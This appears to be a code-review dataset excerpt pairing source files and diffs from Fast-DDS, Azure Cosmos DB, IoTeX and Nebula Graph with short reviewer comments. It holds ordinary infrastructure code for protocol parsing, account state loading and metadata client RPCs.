logWarning(RTPS_PARTICIPANT, "Received PID_IDENTITY_TOKEN but security is disabled");
#endif
break;
}
case fastdds::dds::PID_PERMISSIONS_TOKEN:
{
#if HAVE_SECURITY
const ParameterToken_t* p = dynamic_cast<const ParameterToken_t*>(param);
assert(p != nullptr);
this->permissions_token_ = std::move(p->token);
#else
logWarning(RTPS_PARTICIPANT, "Received PID_PERMISSIONS_TOKEN but security is disabled");
#endif
break;
}
case fastdds::dds::PID_PARTICIPANT_SECURITY_INFO:
{
#if HAVE_SECURITY
const ParameterParticipantSecurityInfo_t* p =
dynamic_cast<const ParameterParticipantSecurityInfo_t*>(param);
assert(p != nullptr);
this->security_attributes_ = p->security_attributes;
this->plugin_security_attributes_ = p->plugin_security_attributes;
#else
logWarning(RTPS_PARTICIPANT, "Received PID_PARTICIPANT_SECURITY_INFO but security is disabled");
#endif
break;
}
default: break;
}
return true;
};
uint32_t qos_size;
clear();
return ParameterList::readParameterListfromCDRMsg(*msg, param_process, use_encapsulation, qos_size);
}
void ParticipantProxyData::clear()
{
m_protocolVersion = ProtocolVersion_t();
m_guid = GUID_t();
//set_VendorId_Unknown(m_VendorId);
m_VendorId = c_VendorId_Unknown;
m_expectsInlineQos = false;
m_availableBuiltinEndpoints = 0;
metatraffic_locators.unicast.clear();
metatraffic_locators.multicast.clear();
default_locators.unicast.clear();
default_locators.multicast.clear();
m_participantName = "";
m_key = InstanceHandle_t();
m_leaseDuration = Duration_t();
lease_duration_ = std::chrono::microseconds::zero();
isAlive = true;
#if HAVE_SECURITY
identity_token_ = IdentityToken();
permissions_token_ = PermissionsToken();
security_attributes_ = 0UL;
plugin_security_attributes_ = 0UL;
#endif
m_properties.properties.clear();
m_properties.length = 0;
m_userData.clear();
}
void ParticipantProxyData::copy(
const ParticipantProxyData& pdata)
{
m_protocolVersion = pdata.m_protocolVersion;
m_guid = pdata.m_guid;
m_VendorId[0] = pdata.m_VendorId[0];
m_VendorId[1] = pdata.m_VendorId[1];
m_availableBuiltinEndpoints = pdata.m_availableBuiltinEndpoints;
metatraffic_locators = pdata.metatraffic_locators;
default_locators = pdata.default_locators;
m_participantName = pdata.m_participantName;
m_leaseDuration = pdata.m_leaseDuration;
lease_duration_ = std::chrono::microseconds(TimeConv::Duration_t2MicroSecondsInt64(pdata.m_leaseDuration));
m_key = pdata.m_key;
isAlive = pdata.isAlive;
m_properties = pdata.m_properties;
m_userData = pdata.m_userData;
// This method is only called when a new participant is discovered.The destination of the copy
// will always be a new ParticipantProxyData or one from the pool, so there is no need for
// m_readers and m_writers to be copied
#if HAVE_SECURITY
identity_token_ = pdata.identity_token_;
permissions_token_ = pdata.permissions_token_;
security_attributes_ = pdata.security_attributes_;
plugin_security_attributes_ = pdata.plugin_security_attributes_;
#endif
}
bool ParticipantProxyData::updateData(
ParticipantProxyData& pdata)
{
metatraffic_locators = pdata.metatraffic_locators;
default_locators = pdata.default_locators;
m_properties = pdata.m_properties;
m_leaseDuration = pdata.m_leaseDuration;
m_userData = pdata.m_userData;
isAlive = true;
#if HAVE_SECURITY
identity_token_ = pdata.identity_token_;
permissions_token_ = pdata.permissions_token_;
security_attributes_ = pdata.security_attributes_;
plugin_security_attributes_ = pdata.plugin_security_attributes_;
#endif
auto new_lease_duration = std::chrono::microseconds(TimeConv::Duration_t2MicroSecondsInt64(m_leaseDuration));
if (this->lease_duration_event != nullptr)
{
if (new_lease_duration < lease_duration_)
{
// Calculate next trigger.
auto real_lease_tm = last_received_message_tm_ + new_lease_duration;
auto next_trigger = real_lease_tm - std::chrono::steady_clock::now();
lease_duration_event->cancel_timer();
lease_duration_event->update_interval_millisec(
(double)std::chrono::duration_cast<std::chrono::milliseconds>(next_trigger).count());
lease_duration_event->restart_timer();
}
}
lease_duration_ = new_lease_duration;
return true;
}
void ParticipantProxyData::set_persistence_guid(
const GUID_t& guid)
{
// only valid values
if (guid == c_Guid_Unknown)
{
return;
}
// generate pair
std::pair<std::string, std::string> persistent_guid;
persistent_guid.first = "PID_PERSISTENCE_GUID";
std::ostringstream data;
data << guid;
persistent_guid.second = data.str();
// if exists replace
std::vector<std::pair<std::string, std::string> >& props = m_properties.properties;
std::vector<std::pair<std::string, std::string> >::iterator it =
std::find_if(
props.begin(),
props.end(),
[&persistent_guid](const std::pair<std::string, std::string>& p)
{
return persistent_guid.first == p.first;
});
if (it != props.end())
{
*it = std::move(persistent_guid);
}
else
{
// if not exists add
m_properties.properties.push_back(std::move(persistent_guid));
}
}
GUID_t ParticipantProxyData::get_persistence_guid() const
{
GUID_t persistent(c_Guid_Unknown);
const std::vector<std::pair<std::string, std::string> >& props = m_properties.properties;
std::vector<std::pair<std::string, std::string> >::const_iterator it =
std::find_if(
props.cbegin(),
props.cend(),
[](const std::pair<std::string, std::string>& p)
{
return "PID_PERSISTENCE_GUID" == p.first;
});
if (it != props.end())
{
std::istringstream in(it->second);
in >> persistent;
}
return persistent;
}
void ParticipantProxyData::assert_liveliness()
{
last_received_message_tm_ = std::chrono::steady_clock::now();
}
} /* namespace rtps */
} /* namespace fastrtps */
} /* namespace eprosima */
| 1 | 16,468 | Is this necessary? | eProsima-Fast-DDS | cpp |
@@ -0,0 +1,15 @@
+namespace Microsoft.Azure.Cosmos.CosmosElements
+{
+ internal abstract class CosmosElement
+ {
+ protected CosmosElement(CosmosElementType cosmosItemType)
+ {
+ this.Type = cosmosItemType;
+ }
+
+ public CosmosElementType Type
+ {
+ get;
+ }
+ }
+} | 1 | 1 | 15,361 | How about this NS inside query NS? | Azure-azure-cosmos-dotnet-v3 | .cs |
|
@@ -53,7 +53,7 @@ func LoadOrCreateAccount(sm protocol.StateManager, encodedAddr string) (*state.A
}
// LoadAccount loads an account state
-func LoadAccount(sm protocol.StateManager, addrHash hash.Hash160) (*state.Account, error) {
+func LoadAccount(sm protocol.StateReader, addrHash hash.Hash160) (*state.Account, error) {
var account state.Account
if err := sm.State(addrHash, &account); err != nil {
if errors.Cause(err) == state.ErrStateNotExist { | 1 | // Copyright (c) 2018 IoTeX
// This is an alpha (internal) release and is not suitable for production. This source code is provided 'as is' and no
// warranties are given as to title or non-infringement, merchantability or fitness for purpose and, to the extent
// permitted by law, all liability for your use of the code is disclaimed. This source code is governed by Apache
// License 2.0 that can be found in the LICENSE file.
package accountutil
import (
"math/big"
"github.com/pkg/errors"
"github.com/iotexproject/go-pkgs/hash"
"github.com/iotexproject/iotex-address/address"
"github.com/iotexproject/iotex-core/action/protocol"
"github.com/iotexproject/iotex-core/state"
)
type noncer interface {
Nonce() uint64
}
// SetNonce sets nonce for account
func SetNonce(i noncer, state *state.Account) {
if i.Nonce() > state.Nonce {
state.Nonce = i.Nonce()
}
}
// LoadOrCreateAccount either loads an account state or creates an account state
func LoadOrCreateAccount(sm protocol.StateManager, encodedAddr string) (*state.Account, error) {
var account state.Account
addr, err := address.FromString(encodedAddr)
if err != nil {
account = state.EmptyAccount()
return &account, errors.Wrap(err, "failed to get address public key hash from encoded address")
}
addrHash := hash.BytesToHash160(addr.Bytes())
err = sm.State(addrHash, &account)
if err == nil {
return &account, nil
}
if errors.Cause(err) == state.ErrStateNotExist {
account.Balance = big.NewInt(0)
account.VotingWeight = big.NewInt(0)
if err := sm.PutState(addrHash, account); err != nil {
return nil, errors.Wrapf(err, "failed to put state for account %x", addrHash)
}
return &account, nil
}
return nil, err
}
// LoadAccount loads an account state
func LoadAccount(sm protocol.StateManager, addrHash hash.Hash160) (*state.Account, error) {
var account state.Account
if err := sm.State(addrHash, &account); err != nil {
if errors.Cause(err) == state.ErrStateNotExist {
account = state.EmptyAccount()
return &account, nil
}
return nil, err
}
return &account, nil
}
// StoreAccount puts updated account state to trie
func StoreAccount(sm protocol.StateManager, encodedAddr string, account *state.Account) error {
addr, err := address.FromString(encodedAddr)
if err != nil {
return errors.Wrap(err, "failed to get address public key hash from encoded address")
}
addrHash := hash.BytesToHash160(addr.Bytes())
return sm.PutState(addrHash, account)
}
// Recorded tests if an account has been actually stored
func Recorded(sm protocol.StateManager, addr address.Address) (bool, error) {
var account state.Account
err := sm.State(hash.BytesToHash160(addr.Bytes()), &account)
if err == nil {
return true, nil
}
if errors.Cause(err) == state.ErrStateNotExist {
return false, nil
}
return false, err
}
| 1 | 20,479 | in line 79, sm also can be stateReader | iotexproject-iotex-core | go |
@@ -876,6 +876,13 @@ int32_t MetaClient::partsNum(GraphSpaceID spaceId) {
return it->second->partsAlloc_.size();
}
+std::unordered_map<HostAddr, std::vector<PartitionID>>
+MetaClient::partsBySpace(GraphSpaceID spaceId) {
+ folly::RWSpinLock::ReadHolder holder(localCacheLock_);
+ auto it = localCache_.find(spaceId);
+ CHECK(it != localCache_.end());
+ return it->second->partsOnHost_;
+}
folly::Future<StatusOr<TagID>>
MetaClient::createTagSchema(GraphSpaceID spaceId, std::string name, nebula::cpp2::Schema schema) { | 1 | /* Copyright (c) 2018 vesoft inc. All rights reserved.
*
* This source code is licensed under Apache 2.0 License,
* attached with Common Clause Condition 1.0, found in the LICENSES directory.
*/
#include "meta/common/MetaCommon.h"
#include "meta/client/MetaClient.h"
#include "network/NetworkUtils.h"
#include "meta/NebulaSchemaProvider.h"
#include "meta/ClusterIdMan.h"
#include "meta/GflagsManager.h"
DEFINE_int32(load_data_interval_secs, 2 * 60, "Load data interval");
DEFINE_int32(heartbeat_interval_secs, 10, "Heartbeat interval");
DEFINE_int32(meta_client_retry_times, 3, "meta client retry times, 0 means no retry");
DEFINE_int32(meta_client_retry_interval_secs, 1, "meta client sleep interval between retry");
DEFINE_string(cluster_id_path, "cluster.id", "file path saved clusterId");
DECLARE_string(gflags_mode_json);
namespace nebula {
namespace meta {
MetaClient::MetaClient(std::shared_ptr<folly::IOThreadPoolExecutor> ioThreadPool,
std::vector<HostAddr> addrs,
HostAddr localHost,
ClusterID clusterId,
bool sendHeartBeat)
: ioThreadPool_(ioThreadPool)
, addrs_(std::move(addrs))
, localHost_(localHost)
, clusterId_(clusterId)
, sendHeartBeat_(sendHeartBeat) {
CHECK(ioThreadPool_ != nullptr) << "IOThreadPool is required";
CHECK(!addrs_.empty())
<< "No meta server address is specified. Meta server is required";
clientsMan_ = std::make_shared<
thrift::ThriftClientManager<meta::cpp2::MetaServiceAsyncClient>
>();
updateActive();
updateLeader();
bgThread_ = std::make_unique<thread::GenericWorker>();
LOG(INFO) << "Create meta client to " << active_;
}
MetaClient::~MetaClient() {
stop();
VLOG(3) << "~MetaClient";
}
bool MetaClient::isMetadReady() {
if (sendHeartBeat_) {
auto ret = heartbeat().get();
if (!ret.ok() && ret.status() != Status::LeaderChanged()) {
LOG(ERROR) << "Heartbeat failed, status:" << ret.status();
ready_ = false;
return ready_;
}
} // end if
loadData();
loadCfg();
return ready_;
}
bool MetaClient::waitForMetadReady(int count, int retryIntervalSecs) {
std::string gflagsJsonPath;
GflagsManager::getGflagsModule(gflagsModule_);
gflagsDeclared_ = GflagsManager::declareGflags(gflagsModule_);
isRunning_ = true;
int tryCount = count;
while (!isMetadReady() && ((count == -1) || (tryCount > 0)) && isRunning_) {
LOG(INFO) << "Waiting for the metad to be ready!";
--tryCount;
::sleep(retryIntervalSecs);
} // end while
if (!isRunning_) {
LOG(ERROR) << "Connect to the MetaServer Failed";
return false;
}
CHECK(bgThread_->start());
if (sendHeartBeat_) {
LOG(INFO) << "Register time task for heartbeat!";
size_t delayMS = FLAGS_heartbeat_interval_secs * 1000 + folly::Random::rand32(900);
bgThread_->addTimerTask(delayMS,
FLAGS_heartbeat_interval_secs * 1000,
&MetaClient::heartBeatThreadFunc, this);
}
addLoadDataTask();
addLoadCfgTask();
return ready_;
}
void MetaClient::stop() {
if (bgThread_ != nullptr) {
bgThread_->stop();
bgThread_->wait();
bgThread_.reset();
}
isRunning_ = false;
}
void MetaClient::heartBeatThreadFunc() {
auto ret = heartbeat().get();
if (!ret.ok()) {
LOG(ERROR) << "Heartbeat failed, status:" << ret.status();
return;
}
}
void MetaClient::loadDataThreadFunc() {
loadData();
addLoadDataTask();
}
void MetaClient::loadData() {
if (ioThreadPool_->numThreads() <= 0) {
LOG(ERROR) << "The threads number in ioThreadPool should be greater than 0";
return;
}
auto ret = listSpaces().get();
if (!ret.ok()) {
LOG(ERROR) << "List space failed, status:" << ret.status();
return;
}
decltype(localCache_) cache;
decltype(spaceIndexByName_) spaceIndexByName;
decltype(spaceTagIndexByName_) spaceTagIndexByName;
decltype(spaceEdgeIndexByName_) spaceEdgeIndexByName;
decltype(spaceNewestTagVerMap_) spaceNewestTagVerMap;
decltype(spaceNewestEdgeVerMap_) spaceNewestEdgeVerMap;
decltype(spaceEdgeIndexByType_) spaceEdgeIndexByType;
decltype(spaceAllEdgeMap_) spaceAllEdgeMap;
for (auto space : ret.value()) {
auto spaceId = space.first;
auto r = getPartsAlloc(spaceId).get();
if (!r.ok()) {
LOG(ERROR) << "Get parts allocation failed for spaceId " << spaceId
<< ", status " << r.status();
return;
}
auto spaceCache = std::make_shared<SpaceInfoCache>();
auto partsAlloc = r.value();
spaceCache->spaceName = space.second;
spaceCache->partsOnHost_ = reverse(partsAlloc);
spaceCache->partsAlloc_ = std::move(partsAlloc);
VLOG(2) << "Load space " << spaceId
<< ", parts num:" << spaceCache->partsAlloc_.size();
// loadSchemas
if (!loadSchemas(spaceId,
spaceCache,
spaceTagIndexByName,
spaceEdgeIndexByName,
spaceEdgeIndexByType,
spaceNewestTagVerMap,
spaceNewestEdgeVerMap,
spaceAllEdgeMap)) {
return;
}
cache.emplace(spaceId, spaceCache);
spaceIndexByName.emplace(space.second, spaceId);
}
decltype(localCache_) oldCache;
{
folly::RWSpinLock::WriteHolder holder(localCacheLock_);
oldCache = std::move(localCache_);
localCache_ = std::move(cache);
spaceIndexByName_ = std::move(spaceIndexByName);
spaceTagIndexByName_ = std::move(spaceTagIndexByName);
spaceEdgeIndexByName_ = std::move(spaceEdgeIndexByName);
spaceNewestTagVerMap_ = std::move(spaceNewestTagVerMap);
spaceNewestEdgeVerMap_ = std::move(spaceNewestEdgeVerMap);
spaceEdgeIndexByType_ = std::move(spaceEdgeIndexByType);
spaceAllEdgeMap_ = std::move(spaceAllEdgeMap);
}
diff(oldCache, localCache_);
ready_ = true;
LOG(INFO) << "Load data completed!";
}
void MetaClient::addLoadDataTask() {
size_t delayMS = FLAGS_load_data_interval_secs * 1000 + folly::Random::rand32(900);
bgThread_->addDelayTask(delayMS, &MetaClient::loadDataThreadFunc, this);
}
bool MetaClient::loadSchemas(GraphSpaceID spaceId,
std::shared_ptr<SpaceInfoCache> spaceInfoCache,
SpaceTagNameIdMap &tagNameIdMap,
SpaceEdgeNameTypeMap &edgeNameTypeMap,
SpaceEdgeTypeNameMap &edgeTypeNameMap,
SpaceNewestTagVerMap &newestTagVerMap,
SpaceNewestEdgeVerMap &newestEdgeVerMap,
SpaceAllEdgeMap &allEdgeMap) {
auto tagRet = listTagSchemas(spaceId).get();
if (!tagRet.ok()) {
LOG(ERROR) << "Get tag schemas failed for spaceId " << spaceId << ", " << tagRet.status();
return false;
}
auto edgeRet = listEdgeSchemas(spaceId).get();
if (!edgeRet.ok()) {
LOG(ERROR) << "Get edge schemas failed for spaceId " << spaceId << ", " << edgeRet.status();
return false;
}
auto tagItemVec = tagRet.value();
auto edgeItemVec = edgeRet.value();
TagIDSchemas tagIdSchemas;
EdgeTypeSchemas edgeTypeSchemas;
for (auto& tagIt : tagItemVec) {
std::shared_ptr<NebulaSchemaProvider> schema(new NebulaSchemaProvider(tagIt.version));
for (auto colIt : tagIt.schema.get_columns()) {
schema->addField(colIt.name, std::move(colIt.type));
}
// handle schema property
schema->setProp(tagIt.schema.get_schema_prop());
tagIdSchemas.emplace(std::make_pair(tagIt.tag_id, tagIt.version), schema);
tagNameIdMap.emplace(std::make_pair(spaceId, tagIt.tag_name), tagIt.tag_id);
// get the latest tag version
auto it = newestTagVerMap.find(std::make_pair(spaceId, tagIt.tag_id));
if (it != newestTagVerMap.end()) {
if (it->second < tagIt.version) {
it->second = tagIt.version;
}
} else {
newestTagVerMap.emplace(std::make_pair(spaceId, tagIt.tag_id), tagIt.version);
}
VLOG(3) << "Load Tag Schema Space " << spaceId << ", ID " << tagIt.tag_id
<< ", Name " << tagIt.tag_name << ", Version " << tagIt.version << " Successfully!";
}
for (auto& edgeIt : edgeItemVec) {
std::shared_ptr<NebulaSchemaProvider> schema(new NebulaSchemaProvider(edgeIt.version));
for (auto colIt : edgeIt.schema.get_columns()) {
schema->addField(colIt.name, std::move(colIt.type));
}
// handle shcem property
schema->setProp(edgeIt.schema.get_schema_prop());
edgeTypeSchemas.emplace(std::make_pair(edgeIt.edge_type, edgeIt.version), schema);
edgeNameTypeMap.emplace(std::make_pair(spaceId, edgeIt.edge_name), edgeIt.edge_type);
edgeTypeNameMap.emplace(std::make_pair(spaceId, edgeIt.edge_type), edgeIt.edge_name);
auto it = allEdgeMap.find(spaceId);
if (it == allEdgeMap.end()) {
std::vector<std::string> v = {edgeIt.edge_name};
allEdgeMap.emplace(spaceId, std::move(v));
} else {
it->second.emplace_back(edgeIt.edge_name);
}
// get the latest edge version
auto it2 = newestEdgeVerMap.find(std::make_pair(spaceId, edgeIt.edge_type));
if (it2 != newestEdgeVerMap.end()) {
if (it2->second < edgeIt.version) {
it2->second = edgeIt.version;
}
} else {
newestEdgeVerMap.emplace(std::make_pair(spaceId, edgeIt.edge_type), edgeIt.version);
}
VLOG(3) << "Load Edge Schema Space " << spaceId << ", Type " << edgeIt.edge_type
<< ", Name " << edgeIt.edge_name << ", Version " << edgeIt.version
<< " Successfully!";
}
spaceInfoCache->tagSchemas_ = std::move(tagIdSchemas);
spaceInfoCache->edgeSchemas_ = std::move(edgeTypeSchemas);
return true;
}
std::unordered_map<HostAddr, std::vector<PartitionID>>
MetaClient::reverse(const PartsAlloc& parts) {
std::unordered_map<HostAddr, std::vector<PartitionID>> hosts;
for (auto& partHost : parts) {
for (auto& h : partHost.second) {
hosts[h].emplace_back(partHost.first);
}
}
return hosts;
}
template<typename Request,
typename RemoteFunc,
typename RespGenerator,
typename RpcResponse,
typename Response>
void MetaClient::getResponse(Request req,
RemoteFunc remoteFunc,
RespGenerator respGen,
folly::Promise<StatusOr<Response>> pro,
bool toLeader,
int32_t retry,
int32_t retryLimit) {
auto* evb = ioThreadPool_->getEventBase();
HostAddr host;
{
folly::RWSpinLock::ReadHolder holder(&hostLock_);
host = toLeader ? leader_ : active_;
}
folly::via(evb, [host, evb, req = std::move(req), remoteFunc = std::move(remoteFunc),
respGen = std::move(respGen), pro = std::move(pro),
toLeader, retry, retryLimit, this] () mutable {
auto client = clientsMan_->client(host, evb);
LOG(INFO) << "Send request to meta " << host;
remoteFunc(client, req)
.then(evb, [req = std::move(req), remoteFunc = std::move(remoteFunc),
respGen = std::move(respGen), p = std::move(pro), toLeader, retry,
retryLimit, this] (folly::Try<RpcResponse>&& t) mutable {
// exception occurred during RPC
if (t.hasException()) {
if (toLeader) {
updateLeader();
} else {
updateActive();
}
if (retry < retryLimit) {
sleep(FLAGS_meta_client_retry_interval_secs);
getResponse(std::move(req), std::move(remoteFunc), std::move(respGen),
std::move(p), toLeader, retry + 1, retryLimit);
} else {
p.setValue(Status::Error(folly::stringPrintf("RPC failure in MetaClient: %s",
t.exception().what().c_str())));
}
return;
}
auto&& resp = t.value();
if (resp.code == cpp2::ErrorCode::SUCCEEDED) {
// succeeded
p.setValue(respGen(std::move(resp)));
return;
} else if (resp.code == cpp2::ErrorCode::E_LEADER_CHANGED) {
HostAddr leader(resp.get_leader().get_ip(), resp.get_leader().get_port());
{
folly::RWSpinLock::WriteHolder holder(hostLock_);
leader_ = leader;
}
}
// errored
if (retry < retryLimit) {
sleep(FLAGS_meta_client_retry_interval_secs);
getResponse(std::move(req), std::move(remoteFunc), std::move(respGen),
std::move(p), toLeader, retry + 1, retryLimit);
} else {
p.setValue(this->handleResponse(resp));
}
}); // then
}); // via
}
std::vector<HostAddr> MetaClient::to(const std::vector<nebula::cpp2::HostAddr>& tHosts) {
std::vector<HostAddr> hosts;
hosts.resize(tHosts.size());
std::transform(tHosts.begin(), tHosts.end(), hosts.begin(), [](const auto& h) {
return HostAddr(h.get_ip(), h.get_port());
});
return hosts;
}
std::vector<SpaceIdName> MetaClient::toSpaceIdName(const std::vector<cpp2::IdName>& tIdNames) {
std::vector<SpaceIdName> idNames;
idNames.resize(tIdNames.size());
std::transform(tIdNames.begin(), tIdNames.end(), idNames.begin(), [](const auto& tin) {
return SpaceIdName(tin.id.get_space_id(), tin.name);
});
return idNames;
}
template<typename RESP>
Status MetaClient::handleResponse(const RESP& resp) {
switch (resp.get_code()) {
case cpp2::ErrorCode::SUCCEEDED:
return Status::OK();
case cpp2::ErrorCode::E_EXISTED:
return Status::Error("existed!");
case cpp2::ErrorCode::E_NOT_FOUND:
return Status::Error("not existed!");
case cpp2::ErrorCode::E_NO_HOSTS:
return Status::Error("no hosts!");
case cpp2::ErrorCode::E_CONFIG_IMMUTABLE:
return Status::CfgImmutable();
case cpp2::ErrorCode::E_CONFLICT:
return Status::Error("conflict!");
case cpp2::ErrorCode::E_WRONGCLUSTER:
return Status::Error("wrong cluster!");
case cpp2::ErrorCode::E_LEADER_CHANGED: {
return Status::LeaderChanged();
}
default:
return Status::Error("Unknown code %d", static_cast<int32_t>(resp.get_code()));
}
}
PartsMap MetaClient::doGetPartsMap(const HostAddr& host,
const LocalCache& localCache) {
PartsMap partMap;
for (auto it = localCache.begin(); it != localCache.end(); it++) {
auto spaceId = it->first;
auto& cache = it->second;
auto partsIt = cache->partsOnHost_.find(host);
if (partsIt != cache->partsOnHost_.end()) {
for (auto& partId : partsIt->second) {
auto partAllocIter = cache->partsAlloc_.find(partId);
CHECK(partAllocIter != cache->partsAlloc_.end());
auto& partM = partMap[spaceId][partId];
partM.spaceId_ = spaceId;
partM.partId_ = partId;
partM.peers_ = partAllocIter->second;
}
}
}
return partMap;
}
void MetaClient::diff(const LocalCache& oldCache, const LocalCache& newCache) {
folly::RWSpinLock::WriteHolder holder(listenerLock_);
if (listener_ == nullptr) {
VLOG(3) << "Listener is null!";
return;
}
auto newPartsMap = doGetPartsMap(localHost_, newCache);
auto oldPartsMap = doGetPartsMap(localHost_, oldCache);
VLOG(1) << "Let's check if any new parts added/updated for " << localHost_;
for (auto it = newPartsMap.begin(); it != newPartsMap.end(); it++) {
auto spaceId = it->first;
const auto& newParts = it->second;
auto oldIt = oldPartsMap.find(spaceId);
if (oldIt == oldPartsMap.end()) {
VLOG(1) << "SpaceId " << spaceId << " was added!";
listener_->onSpaceAdded(spaceId);
for (auto partIt = newParts.begin(); partIt != newParts.end(); partIt++) {
listener_->onPartAdded(partIt->second);
}
} else {
const auto& oldParts = oldIt->second;
for (auto partIt = newParts.begin(); partIt != newParts.end(); partIt++) {
auto oldPartIt = oldParts.find(partIt->first);
if (oldPartIt == oldParts.end()) {
VLOG(1) << "SpaceId " << spaceId << ", partId "
<< partIt->first << " was added!";
listener_->onPartAdded(partIt->second);
} else {
const auto& oldPartMeta = oldPartIt->second;
const auto& newPartMeta = partIt->second;
if (oldPartMeta != newPartMeta) {
VLOG(1) << "SpaceId " << spaceId
<< ", partId " << partIt->first << " was updated!";
listener_->onPartUpdated(newPartMeta);
}
}
}
}
}
VLOG(1) << "Let's check if any old parts removed....";
for (auto it = oldPartsMap.begin(); it != oldPartsMap.end(); it++) {
auto spaceId = it->first;
const auto& oldParts = it->second;
auto newIt = newPartsMap.find(spaceId);
if (newIt == newPartsMap.end()) {
VLOG(1) << "SpaceId " << spaceId << " was removed!";
for (auto partIt = oldParts.begin(); partIt != oldParts.end(); partIt++) {
listener_->onPartRemoved(spaceId, partIt->first);
}
listener_->onSpaceRemoved(spaceId);
} else {
const auto& newParts = newIt->second;
for (auto partIt = oldParts.begin(); partIt != oldParts.end(); partIt++) {
auto newPartIt = newParts.find(partIt->first);
if (newPartIt == newParts.end()) {
VLOG(1) << "SpaceId " << spaceId
<< ", partId " << partIt->first << " was removed!";
listener_->onPartRemoved(spaceId, partIt->first);
}
}
}
}
}
/// ================================== public methods =================================
folly::Future<StatusOr<GraphSpaceID>>
MetaClient::createSpace(std::string name, int32_t partsNum, int32_t replicaFactor) {
cpp2::SpaceProperties properties;
properties.set_space_name(std::move(name));
properties.set_partition_num(partsNum);
properties.set_replica_factor(replicaFactor);
cpp2::CreateSpaceReq req;
req.set_properties(std::move(properties));
folly::Promise<StatusOr<GraphSpaceID>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_createSpace(request);
}, [] (cpp2::ExecResp&& resp) -> GraphSpaceID {
return resp.get_id().get_space_id();
}, std::move(promise), true);
return future;
}
folly::Future<StatusOr<std::vector<SpaceIdName>>> MetaClient::listSpaces() {
cpp2::ListSpacesReq req;
folly::Promise<StatusOr<std::vector<SpaceIdName>>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_listSpaces(request);
}, [this] (cpp2::ListSpacesResp&& resp) -> decltype(auto) {
return this->toSpaceIdName(resp.get_spaces());
}, std::move(promise));
return future;
}
folly::Future<StatusOr<cpp2::SpaceItem>>
MetaClient::getSpace(std::string name) {
cpp2::GetSpaceReq req;
req.set_space_name(std::move(name));
folly::Promise<StatusOr<cpp2::SpaceItem>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_getSpace(request);
}, [] (cpp2::GetSpaceResp&& resp) -> decltype(auto) {
return std::move(resp).get_item();
}, std::move(promise));
return future;
}
folly::Future<StatusOr<bool>> MetaClient::dropSpace(std::string name) {
cpp2::DropSpaceReq req;
req.set_space_name(std::move(name));
folly::Promise<StatusOr<bool>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_dropSpace(request);
}, [] (cpp2::ExecResp&& resp) -> bool {
return resp.code == cpp2::ErrorCode::SUCCEEDED;
}, std::move(promise), true);
return future;
}
folly::Future<StatusOr<bool>> MetaClient::addHosts(const std::vector<HostAddr>& hosts) {
std::vector<nebula::cpp2::HostAddr> thriftHosts;
thriftHosts.resize(hosts.size());
std::transform(hosts.begin(), hosts.end(), thriftHosts.begin(), [](const auto& h) {
nebula::cpp2::HostAddr th;
th.set_ip(h.first);
th.set_port(h.second);
return th;
});
cpp2::AddHostsReq req;
req.set_hosts(std::move(thriftHosts));
folly::Promise<StatusOr<bool>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_addHosts(request);
}, [] (cpp2::ExecResp&& resp) -> bool {
return resp.code == cpp2::ErrorCode::SUCCEEDED;
}, std::move(promise), true);
return future;
}
folly::Future<StatusOr<std::vector<cpp2::HostItem>>> MetaClient::listHosts() {
cpp2::ListHostsReq req;
folly::Promise<StatusOr<std::vector<cpp2::HostItem>>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_listHosts(request);
}, [] (cpp2::ListHostsResp&& resp) -> decltype(auto) {
return resp.hosts;
}, std::move(promise));
return future;
}
folly::Future<StatusOr<bool>> MetaClient::removeHosts(const std::vector<HostAddr>& hosts) {
std::vector<nebula::cpp2::HostAddr> thriftHosts;
thriftHosts.resize(hosts.size());
std::transform(hosts.begin(), hosts.end(), thriftHosts.begin(), [](const auto& h) {
nebula::cpp2::HostAddr th;
th.set_ip(h.first);
th.set_port(h.second);
return th;
});
cpp2::RemoveHostsReq req;
req.set_hosts(std::move(thriftHosts));
folly::Promise<StatusOr<bool>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_removeHosts(request);
}, [] (cpp2::ExecResp&& resp) -> bool {
return resp.code == cpp2::ErrorCode::SUCCEEDED;
}, std::move(promise), true);
return future;
}
folly::Future<StatusOr<std::unordered_map<PartitionID, std::vector<HostAddr>>>>
MetaClient::getPartsAlloc(GraphSpaceID spaceId) {
cpp2::GetPartsAllocReq req;
req.set_space_id(spaceId);
folly::Promise<StatusOr<std::unordered_map<PartitionID, std::vector<HostAddr>>>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_getPartsAlloc(request);
}, [this] (cpp2::GetPartsAllocResp&& resp) -> decltype(auto) {
std::unordered_map<PartitionID, std::vector<HostAddr>> parts;
for (auto it = resp.parts.begin(); it != resp.parts.end(); it++) {
parts.emplace(it->first, to(it->second));
}
return parts;
}, std::move(promise));
return future;
}
StatusOr<GraphSpaceID>
MetaClient::getSpaceIdByNameFromCache(const std::string& name) {
if (!ready_) {
return Status::Error("Not ready!");
}
folly::RWSpinLock::ReadHolder holder(localCacheLock_);
auto it = spaceIndexByName_.find(name);
if (it != spaceIndexByName_.end()) {
return it->second;
}
return Status::SpaceNotFound();
}
StatusOr<TagID> MetaClient::getTagIDByNameFromCache(const GraphSpaceID& space,
const std::string& name) {
if (!ready_) {
return Status::Error("Not ready!");
}
folly::RWSpinLock::ReadHolder holder(localCacheLock_);
auto it = spaceTagIndexByName_.find(std::make_pair(space, name));
if (it == spaceTagIndexByName_.end()) {
return Status::Error("Tag is not exist!");
}
return it->second;
}
StatusOr<EdgeType> MetaClient::getEdgeTypeByNameFromCache(const GraphSpaceID& space,
const std::string& name) {
if (!ready_) {
return Status::Error("Not ready!");
}
folly::RWSpinLock::ReadHolder holder(localCacheLock_);
auto it = spaceEdgeIndexByName_.find(std::make_pair(space, name));
if (it == spaceEdgeIndexByName_.end()) {
return Status::Error("Edge is no exist!");
}
return it->second;
}
StatusOr<std::string> MetaClient::getEdgeNameByTypeFromCache(const GraphSpaceID& space,
const EdgeType edgeType) {
if (!ready_) {
return Status::Error("Not ready!");
}
